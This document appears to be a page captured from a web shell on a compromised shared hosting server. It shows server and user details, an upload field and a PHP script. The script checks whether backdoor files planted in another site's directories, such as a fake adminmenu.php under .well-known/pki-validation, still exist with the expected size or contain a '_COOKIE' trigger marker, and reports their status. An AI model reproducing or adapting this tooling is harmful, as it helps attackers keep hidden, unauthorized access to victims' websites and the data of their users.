Server : LiteSpeed System : Linux business119.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : jagouws ( 1534) PHP Version : 8.3.19 Disable Function : NONE Directory : /dev/shm/ |
Upload File : |
<?php $r = '/home/daitgacy/noorsmartadvanced.net'; $x = ["/.well-known/pki-validation/adminmenu.php"=>"bd@@1086367@@67", "/.well-known/captcha_qa.php"=>"bd@@1084614@@1034", "/default_error.php"=>"bd@@1084679@@534", "/.well-known/captcha_qa.php"=>"bd@@1086354@@_COOKIE[3]", "/default_error.php"=>"bd@@1087138@@_COOKIE[3]"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');